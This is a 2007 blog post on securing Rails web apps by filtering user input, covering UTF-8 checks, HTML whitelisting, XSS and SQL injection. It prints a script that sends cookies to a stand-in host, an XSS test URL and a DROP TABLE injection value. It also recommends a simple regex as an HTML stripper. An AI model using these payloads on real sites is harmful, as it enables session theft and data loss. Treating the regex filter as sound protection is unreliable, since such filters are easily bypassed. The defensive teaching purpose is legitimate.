Web Security With Ingress Filtering

By Ilya Grigorik on April 27, 2007

You're under a siege, you know you can fight them off, but only if the opponent doesn't get any insider information about the weak points - how do you protect yourself? Well, you could close yourself off from the world (ingress filtering), or let them in, but make sure they don't get out (egress filtering). Either strategy could work, so pick your favorite, and stick to it.

Now, I don't know about you, but I tend to prefer ingress filtering - living among friends just makes for a better environment. So why do we usually skimp on proper input filtering and verification from our users when we build our web applications? Knowing that your data is valid, and in pristine condition once it enters your database significantly simplifies the overall security model. Plus, what could be more important that the security of the data your business logic operates on? It's the bread and butter of your business!

Benefits of strong ingress filtering

Ingress vs. Egress data integrity policy debate is a long standing one, so let me try to sway you to the ingress side. Here are a few direct benefits that result from proper ingress filtering:

No processing is required when outputting data - it's already filtered
You input once, but output many times - it's efficient (refer to 1)
There are more output vectors of attack vs. input failure points (refer to 2)
Directly output data from the database - simpler code (refer to 1)

To be fair, more often than not a mix of ingress and egress policies is required for any given application. However, unlike what most developers like to believe, this is not a license to stop paying attention to your strategy - that's a perfect recipe for a compromised application. Your data is your most important asset, and you better make sure you spend some time thinking about keeping safe if you want to stay in business.

Common security pitfalls

I may be one of the more paranoid developers, but it's a habit I picked up the hard way. After waking up to several compromised servers, and then being forced to spend days to recover, restore, and rebuild, I've come to appreciate the value of security. Server software vulnerabilities aside (Securing your Rails Environment), I think we often overlook security in the applications we build. There is a good reason for this: lack of time and expertise. You just want to get the darn thing running, security is an afterthought. However, these are poor excuses to stake your reputation on, and we need to change this mode of thinking fast or we're headed for trouble. Casual security approach has got to go, and here are a few of the most common pitfalls every developer must be aware of:

Validating and filtering input at character level
Filtering HTML (read scripting)
Plugging cross-site scripting (XSS) holes
Avoiding SQL Injection attacks

Validating user input: secure UTF-8

My recent post on practicing secure UTF-8 input in Rails essentially boils down to this: UTF introduces new vectors of attack that we never had to worry about before. Not every sequence of bytes in UTF-8 is a valid string. Because the characters are multibyte, and variable length, you better make sure that the text you receive is, in fact, meaningful. Beyond that, you need to filter entire families (Cx) of escape characters, and then make sure you serve the data correctly. In my humble opinion, you should read the post, and then check out a few resources at the bottom. It will be well worth your time.

Filtering HTML input

Accepting HTML is a common requirement for user generated content, but it comes with an unfortunate downside of opening the application to some nasty attacks. What if the user provides the following input:

Uh oh, I'm about to steal your cookie.
<script>
   location.href = 'http://random-site.org/?stolen_cookie='+document.cookie;
</style>

To protect yourself, you need to start filtering incoming HTML content with either a whitelist, or a blacklist filter. Blacklists, as their name implies, attempt to remove elements which are known to cause problems: script, onclick, style, etc. However, this is a poor strategy because it amounts to a catch up game - you're never sure that you caught every malicious element out there. Hence, white-listing is the preferred method: allow specified tags only. In Rails, we have a great plugin to do exactly this: white_list. But here is the catch, unlike most examples we see on the web, I would argue that you should perform this filtering when you first get the data. Why? Reasons 1 and 3 for ingress filtering: (1) you input once, but output many times (it's efficient); (3) output directly from the database, means simpler code and less worries.

Further reading: HTML Sanitization at feedparser.org

Plugging cross-site scripting (XSS) holes

XSS is a close cousin of HTML filtering. Anytime you output data that is provided by the user (that is, almost always in your typical Web 2.0 app), you're opening a possible XSS hole. This is not only true for every form field on your page, but also for ever URL parameter on your site! Take a look at this example:

# Template:
Hello <%= params[:user] %>!

# Request:
http://myapp.com/user/<script>alert('hello');</script>

Contrived? Perhaps, but you'll be surprised by the number of applications which will fail this trivial test. Moral of the story: treat every piece of user input as tainted. Clean everything you receive, and be religious about it. If you don't expect HTML input, then filter all tags. Regular expressions are great for this task:

class String
  def clean_xhtml
   # remove everything that smells like html
   self.gsub(/\<[^\>]+\>|&.*?;/,'')
  end
end

p "<a href='http://somewhere.com'>Hello</a>&amp; world".clean_xhtml
# returns "Hello world"

Further reading: A Web Developers guide to Cross Site Scripting (PDF)

Avoiding SQL Injection attacks

An SQL injection attack can turn out to be lethal if your attacker decides to drop a table, or even worse, the entire database (not to mention the case of stealing account information). Again, an example is in order:

# Starting query
query = "SELECT * FROM widgets WHERE id=#{params[:id]};"

# User provided input
params[:id] = "1;DROP TABLE widgets;"

# Resulting query (queries, really):
SELECT * FROM widgets WHERE id=1;DROP TABLE widgets;

A cleverly stuffed parameter turns a simple lookup query into a drop table request! It's as simple as that. To guard against this, make sure that you never, never substitute user input directly into your query without validating, and escaping it first. If you're a Rails developer, memorize Chapter 43 of the Rails manual, it's a must. And here is the tip of the day: your application should never have the privilege to drop or modify the database structure, you should always perform these tasks manually. Now, I'm guilty of this myself, but I'm willing to bet that this will look strangely familiar:

production:
  adapter: mysql
  database: appName_production
  username: root    # << Oi! Fix that!
  password: myPass
  host: localhost

You should never use root logins to access your database. Instead, create a separate user with limited privileges to reign in the possible damage. If this is the only thing you take away from this post, it will be well worth your time. Here are a few queries to create a limited user:

GRANT SELECT, INSERT, UPDATE, DELETE ON MyApp.* TO "limited_user"@"127.0.0.%" IDENTIFIED BY "password1";
GRANT SELECT ON MyApp.* TO "read_only_user"@"localhost" IDENTIFIED BY "password2";
FLUSH PRIVILEGES;

Further reading: SQL Injection at Unixwiz

Security is a process, not a product or a service

Let's face it, security is a process, you can't add it after the fact, nor can you buy it. In fact, if you're looking for it, then you are in trouble already. Right time to start thinking about security is now, while you don't have your reputation on the line and angry users at the door. This is not a comprehensive overview, but it's a good place to start. Be paranoid, it pays off in the long run.

Ilya Grigorik is a web ecosystem engineer, author of High Performance Browser Networking (O'Reilly), and Principal Engineer at Shopify — follow on Twitter.